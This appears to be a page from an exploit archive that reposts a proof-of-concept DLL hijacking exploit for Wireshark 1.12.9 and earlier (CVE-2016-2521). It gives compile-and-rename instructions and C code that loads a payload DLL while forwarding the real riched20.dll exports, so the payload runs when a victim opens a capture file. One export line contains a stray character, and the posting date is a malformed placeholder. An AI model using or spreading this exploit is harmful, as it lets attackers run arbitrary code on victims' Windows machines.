Home / exploitsPDF  

Wireshark <= 1.12.9 DLL hijacking exploit riched20.dll.dll

Posted on 30 November -0001

<HTML><HEAD><TITLE>Wireshark <= 1.12.9 DLL hijacking exploit (riched20.dll.dll)</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>/*
# Exploit Title: Wireshark <= 1.12.9 DLL hijacking exploit (riched20.dll.dll)
# Date: 19/04/2016
# Exploit Author: EccE
# Vendor Homepage: www.wireshark.org
# Software Link: www.wireshark.org/download/win32/all-versions/Wireshark-win32-1.12.5.exe
# Version: 1.15.5 & 1.15.1 tested (but should be working on all versions named in the CVE)
# Category: local
# Tested on: Windows 7 x64 (Service Pack 1, build 7601)
# CVE : CVE-2016-2521

Compile and rename this code as "riched20.dll.dll".  "poc.dll" file contains your payload.

Create a file in the same directory with one of the following extension:
Default Wireshark file extension associations:
.5vw / .acp / .apc / .atc / .bfr / .cap / .enc / .erf / .fdc / .pcap / .pcapng /
.pkt / .rf5 / .snoop / .syc / .tpc / .tr1 / .trace / .trc / .wpc / .wpz
 
Double click & watch a your payload executed =]

See this video for a demo:
https://www.youtube.com/watch?v=_KX2vMXo3Hc

Special thanks @gentilkiwi for pointing me out the obvious !
*/

#include "stdafx.h"

HINSTANCE hDll = LoadLibraryA("poc.dll"); // Another dll which contains the payload to execute

// We link all the exportable functions from Windows riched20.dll to our dll
#pragma comment(linker, "/export:CreateTextServices=C:/Windows/System32/riched20.CreateTextServices")
#pragma comment(linker, "/export:IID_IRichEditOle=C:/Windows/System32/riched20.IID_IRichEditOle")
#pragma comment(linker, "/export:IID_IRichEditOleCallback=C:/Windows/System32/riched20.IID_IRichEditOleCallback")
#pragma comment(linker, "/export:IID_ITextHost=C:/Windows/System32/riched20.IID_ITextHost")
#pragma comment(linker, "/export:IID_ITextHost2=C:/Windows/System32/riched20.IID_ITextHost2")
#pragma comment(linker, "/export:IID_ITextServices=C:/Windows/System32/riched20.IID_ITextServices")
#pragma comment(linker, "/export:REExtendedRegisterClass=C:/Windows/System32/riched20.REExtendedRegisterClass")
#pragma comment(linker, "/export:RichEdit10ANSIWndProc=C:/Windows/System32/riched20.RichEdit10ANSIWndProc")
#pragma comment(linker, "/export:RichEditANSIWndProc=vC:/Windows/System32/riched20.RichEditANSIWndProc")
</BODY></HTML>

 

TOP

Malware :

Exploits :